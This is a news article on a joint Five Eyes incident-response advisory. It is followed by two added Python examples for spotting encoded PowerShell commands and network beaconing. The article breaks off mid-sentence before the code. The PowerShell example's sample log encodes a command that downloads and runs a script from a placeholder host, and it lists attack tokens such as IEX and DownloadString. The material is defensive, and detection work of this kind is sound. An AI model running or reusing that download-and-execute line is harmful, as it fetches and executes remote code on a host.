Britain and the other ‘Five Eyes’ nations have joined forces to issue a rare joint technical guidance update designed to enhance incident response — warning that common knee-jerk actions by systems owners often muddy the waters for investigators and tip off threat actors that the victim is aware of the compromise.
The joint cyber security advisory has been published by the UK’s National Cyber Security Centre in conjunction with its counterparts in the other Five Eyes countries: the US, Canada, Australia and New Zealand. The NCSC notes that it “highlights technical approaches for organisations – including those which protect our most critical assets – that will help to uncover malicious activity” as well as mitigate it.
As Chris Krebs, director of the US Cybersecurity and Infrastructure Security Agency (CISA), puts it: “[This] joint alert is the first of its kind for CISA since our formal establishment in 2018 and one I’ve aimed for since day one. This unified approach to combining our experiences with a range of malicious actors means that we’re able to extend our defensive umbrella on a global scale.”
Here are the seven actions the advisory says to consider, or to avoid.
1: Don’t Mitigate too Fast
Slow and steady can win the race when it comes to tackling intruders in your system. Rushing to take action can cause the loss of volatile data such as memory and other host-based artifacts, the update says. It can also alert the threat actor and cause them to change their tactics or techniques accordingly. You’ve noticed an intrusion? Stay cool, and consider soliciting incident response support from a third party.
2: Look, Don’t Touch
While it may be tempting to ping your adversary, or use nslookup to dig up more details, these actions can tip off the hacker that they have been detected.
3: Pre-Emptive C&C Blocking is Best Avoided
A kneejerk reaction to block any Command and Control (C&C) infrastructure spotted is understandable. But as the advisory explains: “Network infrastructure is fairly inexpensive. An adversary can easily change to new command and control infrastructure, and you will lose visibility of their activity.”
4: Let them Keep Your Creds, for a Bit…
Preemptive credential resets are, the advisory notes — perhaps surprisingly for some — counterproductive: “The adversary is likely to have multiple credentials or access to your entire Active Directory. In this case the attacker will probably use other credentials, create new credentials, or forge tickets.”
5: Log data (Say You Have It…)
The advisory warns against failing to preserve or collect log data that could be critical to identifying access to the compromised systems: if critical log types are not collected, or are not retained for a sufficient length of time, key information about the incident may not be determinable. The Five Eyes update suggests you retain log data for at least one year.
6: Communicating Over the Incident Response Network?
Don’t do that… Keep comms “out of band”.
7: Avoid Whack-a-Mole
“Playing ‘whack-a-mole’ by blocking an IP address—without taking steps to determine what the binary is and how it got there—leaves the adversary an opportunity to change tactics and retain access to the network,” the update warns.
Not recommended: playing Whac-a-Mole with your attacker
Technical Steps You Should Take
The advisory also identifies four technical approaches which should be at the forefront of any response to a breach, as well as recommending information to review for host analysis, including:
- Identifying any process that is not signed and is connecting to the internet looking for beaconing or significant data transfers.
- Collecting all PowerShell command line requests looking for Base64-encoded commands to help identify malicious fileless attacks.
- Looking for excessive WinZip processes, especially with suspicious file names, to help discover exfiltration staging (suspicious file names include naming conventions such as,
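The second bullet, collecting PowerShell command lines and looking for Base64-encoded commands, is the kind of check a response team can script. The example below is added here and is not code from the advisory: it scans constructed process-creation log lines for the PowerShell encoded-command switch, decodes the UTF-16LE/Base64 payload the way powershell.exe would, and reports which decoded commands contain tokens commonly seen in fileless attacks. The log format and the token list are assumptions for illustration.

```python
import base64
import re
from typing import Optional

# powershell.exe accepts abbreviated switches; these forms all mean -EncodedCommand.
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Tokens that frequently appear in decoded fileless payloads (illustrative list, not the advisory's).
SUSPICIOUS_TOKENS = ("Invoke-Expression", "IEX", "DownloadString", "FromBase64String")


def encode_ps(command: str) -> str:
    """Encode a command exactly as -EncodedCommand expects: UTF-16LE text, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Reverse encode_ps; return None for anything that is not valid Base64/UTF-16LE."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error subclasses ValueError
        return None


def scan_lines(lines):
    """Return one finding per log line that launched PowerShell with an encoded command."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = ENCODED_SWITCH.search(line)
        if not match:
            continue
        decoded = decode_ps(match.group(1))
        hits = [t for t in SUSPICIOUS_TOKENS if decoded and t.lower() in decoded.lower()]
        findings.append({"line": number, "decoded": decoded, "indicators": hits})
    return findings


# Constructed sample of Windows 4688-style process-creation records (not real host data).
SAMPLE_LINES = [
    "4688 NewProcessName=powershell.exe CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "4688 NewProcessName=powershell.exe CommandLine=powershell.exe -NoP -W Hidden -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    "4688 NewProcessName=powershell.exe CommandLine=powershell.exe -EncodedCommand "
    + encode_ps("Get-Service | Out-File C:\\temp\\svc.txt"),
]

if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LINES):
        print(finding)
```

Line 1 is ignored because it passes a script path rather than an encoded blob; lines 2 and 3 are decoded, and only the first of those carries indicator tokens worth escalating.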
The advisory adds that teams should take the following actions:
Indicators of Compromise Search: Collect known bad indicators of compromise from a broad variety of sources, and search for those indicators in network and host artifacts. By assessing the results of this search you can look for further indications of malicious activity to eliminate false positives.
Frequency Analysis: This can be used to calculate normal traffic patterns in both network and host systems and identify activity that is inconsistent with normal patterns. “Variables often considered include timing, source location, destination location, port utilization, protocol adherence, file location, integrity via hash, file size, naming convention, and other attributes,” the advisory explains.
Pattern Analysis: Analyzing data to identify repeating patterns that are indicative of either automated mechanisms, such as malware or scripts, or routine human threat actor activity can be another useful approach.
Anomaly Detection: Conduct an analyst review (based on the team’s knowledge of, and experience with, system administration) of collected artifacts to identify errors. Review unique values for various datasets and research associated data, where appropriate, to find anomalous activity that could be indicative of threat actor activity.
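The frequency-analysis approach above (timing as one of its variables) and the earlier host-analysis bullet about processes beaconing to the internet come together in the following added example, which is not code from the advisory. It parses a constructed connection log, groups records by source, destination and port, and flags flows whose inter-connection intervals are both numerous and unusually regular, using the coefficient of variation as the regularity score. The record format and the thresholds are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed connection records, "timestamp src dst dport" (not from the advisory or a real network).
SAMPLE_CONNECTIONS = """\
2020-09-01T08:00:00 10.0.0.5 203.0.113.7 443
2020-09-01T08:00:12 10.0.0.5 198.51.100.2 443
2020-09-01T08:05:01 10.0.0.5 203.0.113.7 443
2020-09-01T08:07:40 10.0.0.5 198.51.100.2 443
2020-09-01T08:09:59 10.0.0.5 203.0.113.7 443
2020-09-01T08:15:02 10.0.0.5 203.0.113.7 443
2020-09-01T08:16:03 10.0.0.5 198.51.100.2 443
2020-09-01T08:20:00 10.0.0.5 203.0.113.7 443
2020-09-01T08:31:30 10.0.0.5 198.51.100.2 443
2020-09-01T08:25:01 10.0.0.5 203.0.113.7 443
"""


def parse_connections(text):
    """Group connection timestamps by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return flows


def beacon_candidates(flows, min_events=5, max_cv=0.1):
    """Flag flows with at least min_events connections whose spacing is near-constant.

    cv = population std-dev / mean of the gaps; human-driven traffic has a high cv,
    a scheduled callback (even with small jitter) has a cv close to zero.
    """
    results = []
    for key, times in flows.items():
        if len(times) < min_events:
            continue
        ordered = sorted(times)  # records may arrive out of order
        gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
        avg = mean(gaps)
        if avg <= 0:  # duplicate timestamps only; nothing periodic to measure
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            results.append({"flow": key, "events": len(ordered), "period_s": round(avg, 1), "cv": round(cv, 3)})
    return results
```

In the sample, the flow to 203.0.113.7 repeats roughly every 300 seconds with a few seconds of jitter and is flagged; the flow to 198.51.100.2 is too irregular to qualify. Pair a hit with the host-side check of which process owns the socket and whether its binary is signed before acting on it.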